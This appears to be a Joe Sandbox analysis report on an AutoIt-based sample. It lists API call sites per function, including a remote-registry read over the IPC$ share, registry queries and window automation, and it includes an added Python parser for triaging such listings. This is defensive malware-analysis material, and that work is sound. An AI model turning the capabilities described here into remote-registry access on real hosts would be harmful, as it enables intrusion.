                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009578BC
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009578D8
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00957902
                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0095792A
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00957935
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0095793A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 1411258926-22481851
                                          • Opcode ID: 87bc5a169c361506adb8cae7249ec15b666527e9f338e02d31c37ce7deaa2920
                                          • Instruction ID: 199814fd77c4a7a76bd4185323798a6507abc8be0e03c838f4a0a2a7a0b71239
                                          • Opcode Fuzzy Hash: 87bc5a169c361506adb8cae7249ec15b666527e9f338e02d31c37ce7deaa2920
                                          • Instruction Fuzzy Hash: 0D41F972C14229AFDF11EFE4EC95EEEF778BF44714B404169E915A32A1DA315E08CBA0
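The entry above pairs WNetAddConnection2W (the `\IPC$` share) with RegConnectRegistryW and RegOpenKeyExW, i.e. a remote-registry read, and the entry before it parses the AutoIt script header strings (`>>>AUTOIT SCRIPT<<<`, `AU3!`); the listings in this section are the API call sites of the AutoIt interpreter embedded in the sample, so a capability appearing here means the runtime contains that code path, not that this script exercised it at run time. When triaging many such entries it helps to parse them mechanically rather than read them by eye. The following is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: a parser for this per-function listing format that extracts each call (name, module, arguments, call-site address, whether it is made via a subcall), splits the `String ID` field, and tags each function with capability hints from a small rule table. The rule names and the `SAMPLE_LISTING` (a trimmed excerpt of two entries from this page, with indentation and the "Download File" link text dropped) are this example's own assumptions. Note the caveat in `strings()`: the report joins strings with `$`, so `\IPC$` comes back as `\IPC`.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# One call line with the bullet stripped: "Name.MODULE(args), ref: ADDR". The "(args)"
# group is optional ("timeGetTime.WINMM ref: 00964F7A"); a "Part of subcall function X:"
# prefix marks a call made by callee X rather than by this function itself.
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str                 # DLL or CRT library the import was resolved to
    args: list[str]             # "?" means the argument was not recoverable statically
    ref: int                    # virtual address of the call site
    via_subcall: Optional[str]  # address of the callee that makes the call, if indirect


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)

    def direct_apis(self) -> set[str]:
        return {c.name for c in self.calls if c.via_subcall is None}

    def strings(self) -> list[str]:
        # The report joins referenced strings with "$", so a string that itself ends in
        # "$" (the IPC$ admin share in the remote-registry entry) loses that character.
        return [s for s in self.similarity.get("String ID", "").split("$") if s]


def parse_entries(text: str) -> list[FunctionEntry]:
    entries: list[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if section == "APIs":      # every function entry opens with an APIs header
                entries.append(FunctionEntry())
            continue
        if not entries:
            continue
        if section == "APIs":
            m = CALL_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                entries[-1].calls.append(
                    ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["caller"]))
        elif section == "Similarity":
            key, _, value = line.partition(":")
            entries[-1].similarity[key.strip()] = value.strip()
    return entries


# Capability hints over the APIs a function calls directly (hypothetical rule table).
# A hit means the runtime contains the code path, not that this sample's script used it.
RULES = {
    "remote-registry-over-share": {"WNetAddConnection2W", "RegConnectRegistryW"},
    "registry-read": {"RegOpenKeyExW", "RegQueryValueExW"},
    "window-automation": {"FindWindowExW", "SetActiveWindow"},
}


def tag_entry(entry: FunctionEntry) -> list[str]:
    apis = entry.direct_apis()
    return sorted(tag for tag, needed in RULES.items() if needed <= apis)


# Trimmed excerpt of two entries from the report (constructed test input for this example).
SAMPLE_LISTING = r"""
APIs
  • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
• _memset.LIBCMT ref: 0095786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009578A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009578BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009578D8
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00957902
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00957935
Strings
Memory Dump Source
Similarity
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
• Opcode ID: 87bc5a169c361506adb8cae7249ec15b666527e9f338e02d31c37ce7deaa2920
APIs
• timeGetTime.WINMM ref: 00964F7A
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00964FEC
• SetActiveWindow.USER32 ref: 0096500B
Similarity
• String ID: BUTTON
• Opcode ID: 4a16a09c39ce3b39785ae3c1624d26d0b2eb37f70a81fd0f0029fb2a0f813268
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE_LISTING):
        print(e.similarity.get("Opcode ID", "?")[:16], sorted(e.direct_apis()), tag_entry(e))
```

Run it over the whole "Execution Graph" text of a report to get one tag list per function; the `Opcode ID` is the stable key to join on across reports, since the `ref:` addresses move with the image base.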
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097FDAD,?,?), ref: 00980E31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          • Opcode ID: fd070ba4a1e1aebab796c927922b26a44226c4e9600f86b218ca930bdd8e15b5
                                          • Instruction ID: 7543a00929bf7271b36bd0c00f63cd36b011fd6c307da3027d79edcf5ffc9b38
                                          • Opcode Fuzzy Hash: fd070ba4a1e1aebab796c927922b26a44226c4e9600f86b218ca930bdd8e15b5
                                          • Instruction Fuzzy Hash: 55416C3111035A8FCF60EF50E996AEF37A4AFD1314F544424FE651B3A6DB34A91ACB60
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0093E2A0,00000010,?,Bad directive syntax error,0098F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0095F7C2
                                          • LoadStringW.USER32(00000000,?,0093E2A0,00000010), ref: 0095F7C9
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • _wprintf.LIBCMT ref: 0095F7FC
                                          • __swprintf.LIBCMT ref: 0095F81E
                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0095F88D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          • API String ID: 1506413516-4153970271
                                          • Opcode ID: 3c842156ab18ae8576d8aa45fec9786aa0f4bad8c36f5d4a46b890823d4cdc32
                                          • Instruction ID: 65701d9f12126bc4edee0719375a5591097ce8265032c2bed513ac43d2c5d42b
                                          • Opcode Fuzzy Hash: 3c842156ab18ae8576d8aa45fec9786aa0f4bad8c36f5d4a46b890823d4cdc32
                                          • Instruction Fuzzy Hash: 6C214A3290421EBFCF11EF90CC1AFEE7739BF58324F044865F515661A1EA35AA18DB50
                                          APIs
                                            • Part of subcall function 00907BCC: _memmove.LIBCMT ref: 00907C06
                                            • Part of subcall function 00907924: _memmove.LIBCMT ref: 009079AD
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00965330
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00965346
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00965357
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00965369
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0096537A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          • Opcode ID: 0bb15487d5e398db0e4614bfb71f940208cc3ccfb9e94d5f9b1432aea95d8895
                                          • Instruction ID: d4c9e0b27434a4c27497cbde7d91c7b5080f542855ee347a4b2252daf2b562a2
                                          • Opcode Fuzzy Hash: 0bb15487d5e398db0e4614bfb71f940208cc3ccfb9e94d5f9b1432aea95d8895
                                          • Instruction Fuzzy Hash: C8118271E50169BDD724B6A1CC4AEFFBB7CEBD5F68F500429B411A21E1EEA01D05C6A0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          • Opcode ID: d2adc70614b0448640d3ba543cd766422ee3e4e8b49181de5fcfee257b01208b
                                          • Instruction ID: 62064b55f317a24d59ef963b3b60215d7440debcaec99c504f9fbef444884829
                                          • Opcode Fuzzy Hash: d2adc70614b0448640d3ba543cd766422ee3e4e8b49181de5fcfee257b01208b
                                          • Instruction Fuzzy Hash: 8411E431504114AFDB20AB70AC4AFEA77BCEF82711F0401B6F449961A1EF75CAC19B50
                                          APIs
                                          • timeGetTime.WINMM ref: 00964F7A
                                            • Part of subcall function 0092049F: timeGetTime.WINMM(?,76C1B400,00910E7B), ref: 009204A3
                                          • Sleep.KERNEL32(0000000A), ref: 00964FA6
                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00964FCA
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00964FEC
                                          • SetActiveWindow.USER32 ref: 0096500B
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00965019
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00965038
                                          • Sleep.KERNEL32(000000FA), ref: 00965043
                                          • IsWindow.USER32 ref: 0096504F
                                          • EndDialog.USER32(00000000), ref: 00965060
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: 4a16a09c39ce3b39785ae3c1624d26d0b2eb37f70a81fd0f0029fb2a0f813268
                                          • Instruction ID: 5b940ed4038e10ebe2c1130e8e782fa0c176f8c49d32c9c41ccc3fd0e295a135
                                          • Opcode Fuzzy Hash: 4a16a09c39ce3b39785ae3c1624d26d0b2eb37f70a81fd0f0029fb2a0f813268
                                          • Instruction Fuzzy Hash: 3821C070A2C605AFE7105F70ED99F263BADEB44745F252024F106822B1DB718D50FB61
                                          APIs
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • CoInitialize.OLE32(00000000), ref: 0096D5EA
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0096D67D
                                          • SHGetDesktopFolder.SHELL32(?), ref: 0096D691
                                          • CoCreateInstance.OLE32(00992D7C,00000000,00000001,009B8C1C,?), ref: 0096D6DD
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0096D74C
                                          • CoTaskMemFree.OLE32(?,?), ref: 0096D7A4
                                          • _memset.LIBCMT ref: 0096D7E1
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0096D81D
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0096D840
                                          • CoTaskMemFree.OLE32(00000000), ref: 0096D847
                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0096D87E
                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0096D880
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                          • String ID:
                                          • API String ID: 1246142700-0
                                          • Opcode ID: c30be50a87430fbf821270c3a5cbace706b8c987ddcbf5b9c3019bf8f2cf52de
                                          • Instruction ID: 876d425fb1f11e99839a9a7efd6eda506f06503c252c1ac2c0f2f49f227739fe
                                          • Opcode Fuzzy Hash: c30be50a87430fbf821270c3a5cbace706b8c987ddcbf5b9c3019bf8f2cf52de
                                          • Instruction Fuzzy Hash: 00B1EE75A00109AFDB04DF64C898EAEBBB9FF89314F148469F919DB261DB30ED45CB50
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 0095C283
                                          • GetWindowRect.USER32(00000000,?), ref: 0095C295
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0095C2F3
                                          • GetDlgItem.USER32(?,00000002), ref: 0095C2FE
                                          • GetWindowRect.USER32(00000000,?), ref: 0095C310
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0095C364
                                          • GetDlgItem.USER32(?,000003E9), ref: 0095C372
                                          • GetWindowRect.USER32(00000000,?), ref: 0095C383
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0095C3C6
                                          • GetDlgItem.USER32(?,000003EA), ref: 0095C3D4
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0095C3F1
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0095C3FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: 38ca12c1e73627c55d324cf6a67402a7920520d0172e1342a182816f10cd55d4
                                          • Instruction ID: b86c7bef8e38eef44d9e4259d620da40610c90137571392dbacd436f1135705a
                                          • Opcode Fuzzy Hash: 38ca12c1e73627c55d324cf6a67402a7920520d0172e1342a182816f10cd55d4
                                          • Instruction Fuzzy Hash: 7E5141B1B10209AFDB18CFA9DD99A6DBBB9EB88311F14812DF915D6290D7709D448B10
                                          APIs
                                            • Part of subcall function 00901B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00902036,?,00000000,?,?,?,?,009016CB,00000000,?), ref: 00901B9A
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009020D3
                                          • KillTimer.USER32(-00000001,?,?,?,?,009016CB,00000000,?,?,00901AE2,?,?), ref: 0090216E
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0093BCA6
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009016CB,00000000,?,?,00901AE2,?,?), ref: 0093BCD7
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009016CB,00000000,?,?,00901AE2,?,?), ref: 0093BCEE
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009016CB,00000000,?,?,00901AE2,?,?), ref: 0093BD0A
                                          • DeleteObject.GDI32(00000000), ref: 0093BD1C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: 674dca528af36d7118f5d09303008df221ad7773d92ce1a4b6132738280348a7
                                          • Instruction ID: e07f2a5e8144861fafe316bfe2ac4b5db3f82ad0ce660ad091426dfb956ef16c
                                          • Opcode Fuzzy Hash: 674dca528af36d7118f5d09303008df221ad7773d92ce1a4b6132738280348a7
                                          • Instruction Fuzzy Hash: C8616931928B00DFDB359F14D958B2AB7F6FB40312F509929E5828AAB0C774A891EF51
                                          APIs
                                            • Part of subcall function 009025DB: GetWindowLongW.USER32(?,000000EB), ref: 009025EC
                                          • GetSysColor.USER32(0000000F), ref: 009021D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 6d11e2e6edfa29826f03f9b67aed4ba17867a7e649723ba3a937f03511d9c939
                                          • Instruction ID: ff380b26fb47087058290a7770af4c0a6efdf48afe924542a596f839a6639cb4
                                          • Opcode Fuzzy Hash: 6d11e2e6edfa29826f03f9b67aed4ba17867a7e649723ba3a937f03511d9c939
                                          • Instruction Fuzzy Hash: E2416F31108540EFDB295F6CDC9CBB93B69EB46331F244265FE658A2E5C7318C82EB61
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,0098F910), ref: 0096A90B
                                          • GetDriveTypeW.KERNEL32(00000061,009B89A0,00000061), ref: 0096A9D5
                                          • _wcscpy.LIBCMT ref: 0096A9FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2820617543-1000479233
                                          • Opcode ID: aa2d1cd4b15716edd78241767c5fa6ef605bef6fedc65734b056dd8be903fa36
                                          • Instruction ID: 7eb9604f2e2bc3bbeeecac07c3adb2d851bf584c58dcbf3a246e41e574594822
                                          • Opcode Fuzzy Hash: aa2d1cd4b15716edd78241767c5fa6ef605bef6fedc65734b056dd8be903fa36
                                          • Instruction Fuzzy Hash: 93517831118301AFC710EF14D992AAFB7A9EFC4354F64482AF996672A2DB319909CA53
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: be07271bf80b6d6a5a10715eb31706a0e08f4ed91d87050ff035a971eaa81e70
                                          • Instruction ID: c76cc5ccf826367ce487161df1fa5481664a5e846d7107536a13139ef3a24510
                                          • Opcode Fuzzy Hash: be07271bf80b6d6a5a10715eb31706a0e08f4ed91d87050ff035a971eaa81e70
                                          • Instruction Fuzzy Hash: F041C371904205AFDB24EF74D856F7A73ECEF85310F20886EF949DA2D2EA35A9418B10
                                          APIs
                                          • _memset.LIBCMT ref: 0098716A
                                          • CreateMenu.USER32 ref: 00987185
                                          • SetMenu.USER32(?,00000000), ref: 00987194
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00987221
                                          • IsMenu.USER32(?), ref: 00987237
                                          • CreatePopupMenu.USER32 ref: 00987241
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0098726E
                                          • DrawMenuBar.USER32 ref: 00987276
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$F
                                          • API String ID: 176399719-3044882817
                                          • Opcode ID: 32e425742ce0db771b39c1f0e1d56b67e6ed19b06f4e967e348f84e1516bf1ad
                                          • Instruction ID: 57e9adbae890dd9597679b6b350cb9144a2694ca4fdd31ed351cc6572bae86a8
                                          • Opcode Fuzzy Hash: 32e425742ce0db771b39c1f0e1d56b67e6ed19b06f4e967e348f84e1516bf1ad
                                          • Instruction Fuzzy Hash: E2415B74A15205EFDB10DFA4D898EAABBB9FF49310F240028F91597361D731A910DF90
                                          APIs
